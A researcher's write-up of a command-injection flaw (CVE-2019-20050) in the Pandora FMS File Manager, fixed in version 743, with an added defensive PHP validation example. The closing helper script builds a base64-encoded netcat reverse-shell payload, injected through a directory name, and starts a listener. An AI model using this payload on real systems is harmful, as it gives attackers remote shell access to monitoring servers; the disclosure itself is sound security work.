
Pandora FMS <= 7.42: Remote Code Execution Vulnerability in the File Manager

#pandorafms#hacking#exploit#rce#cve
Last Modified: 2024.01.19.
cve-2019-20050


General Information

I reported it to NVD/MITRE and the vendor accepted it as a vulnerability. It is fixed in Pandora FMS version 743.

Prerequisites to exploit the vulnerability

  1. The PHP Fileinfo extension must be disabled on the host.
  2. An admin account is necessary to access the File Manager.

Technical Details

Searching for a vulnerability ...

I checked the source code of Pandora FMS and searched for dangerous functions such as exec. I found an interesting exec call in pandora_console/include/functions_filemanager.php. The important function was:

[Image 01]
...

[Image 02]

This function has a $filename parameter, which is normally a file or folder name.

The finfo_open function is part of the PHP Fileinfo extension (PHP Fileinfo Documentation). There are cases in which this extension is disabled, so I disabled it in my test environment by editing the necessary configuration file:

[Image 03]

I made the following test file:

[Image 04]

I tested it like this:

[Image 05]

Finding a way to execute my code via the File Manager from the browser

It was an iterative job.

  1. I modified the source code and added extra logging to save the parameter of the mime_content_type function.
  2. I saved the output to /tmp/filemanager.log.
  3. In every iteration, I checked the log and tried to find a way to execute my code.

Notes

  1. I made a simple test directory to reduce the number of log entries ("k44").
  2. Later the log was no longer necessary, because the relevant part was visible from the browser.
  3. Anybody who visits the File Manager can trigger the code execution.
  4. To trigger the code execution, it is enough to visit the parent folder of the "tricky" folder.
  5. At the end I restored the original source code.

[Image 06]

Internal steps

I tried to create new directories in my k44 directory. If the directory creation succeeded, the new directory was visible in the file manager, e.g. the "k4m1ll0" directory:

[Image 07]

Note: in this screenshot the older Pandora FMS instance was in use, but it works in the new environment too. I used it because it was easier to restore the VMware image during the test phase.

This form does not filter the input properly. Some characters are not allowed by the host operating system, e.g. "/", but most characters are accepted by the web application.
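The root cause above is an untrusted entry name reaching a shell command when the Fileinfo fallback is used, combined with a create-directory form that does not validate names. The following is an added example (my own code, not Pandora FMS's; the function names isSafeEntryName and safeMimeType are mine) showing how both sides would be hardened: a strict whitelist for entry names, which the mkdir form should apply too, and a MIME lookup that prefers finfo and, if it must shell out, passes the path only through escapeshellarg().

```php
<?php
// Added example (not Pandora FMS code): a MIME-type lookup that never builds a
// shell command from an untrusted name. Function names here are assumptions.

// Reject directory entry names that could carry shell syntax. Returns true only
// for a plain name of ASCII letters, digits, dot, dash and underscore, with no
// path separators and not "." or "..". Apply the same check when a new
// directory name is submitted, so a "tricky" folder is never created.
function isSafeEntryName(string $name): bool
{
    if ($name === '' || $name === '.' || $name === '..') {
        return false;
    }
    return preg_match('/\A[A-Za-z0-9._-]{1,255}\z/', $name) === 1;
}

// Resolve a MIME type for $path, preferring the Fileinfo extension. When the
// extension is missing, shell out only with escapeshellarg() and only for a
// validated basename, so a name such as ";`id`" is treated as data, not syntax.
function safeMimeType(string $path): ?string
{
    if (!isSafeEntryName(basename($path))) {
        return null;                      // refuse to inspect suspicious names
    }
    if (function_exists('finfo_open')) {
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        if ($finfo === false) {
            return null;
        }
        $type = finfo_file($finfo, $path);
        finfo_close($finfo);
        return $type === false ? null : $type;
    }
    // Fallback without Fileinfo: quote the argument, never interpolate it raw.
    $out = [];
    $rc  = 0;
    exec('file -bi ' . escapeshellarg($path) . ' 2>/dev/null', $out, $rc);
    return ($rc === 0 && isset($out[0])) ? trim($out[0]) : null;
}

// Quick self-check of the validator against the kind of names seen in the write-up.
assert(isSafeEntryName('k4m1ll0') === true);
assert(isSafeEntryName(';`id`') === false);     // backtick substitution rejected
assert(isSafeEntryName('../etc') === false);    // path traversal rejected
assert(isSafeEntryName('..') === false);
```

Run it with `php -d zend.assertions=1 example.php`; with assertions enabled, a regression in the validator fails loudly instead of silently passing a hostile name on to exec().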

The IP address of the Attacker machine was 192.168.0.60. I encoded the reverse shell command with base64.

[Image 08]

I started a netcat listener.

[Image 09]

The final payload was:

[Image 10]

Proof:

[Image 11]

Additional content

Helper Script

#!/bin/bash
clear
echo "######################################################"
echo "### PandoraFMS Filemanager RCE v1.0"
echo "### Author: k4m1ll0"
echo "### Date: 2019.12.28."
echo "######################################################"

#### SETTINGS ##############################################"
IP="192.168.0.81"
PORT=9000
############################################################"

echo 'IP: ' "$IP" ', PORT: ' "$PORT"
ENCODED_COMMAND=`echo -n "nc -e /bin/bash $IP $PORT" | base64`
FINAL_COMMAND=";\`echo -n "$ENCODED_COMMAND" | base64 -d\`"

echo "Copy and paste the following line:"
echo $FINAL_COMMAND
nc -lvp "$PORT"

© 2019-2024 Kamilló Matek (k4m1ll0) All Rights Reserved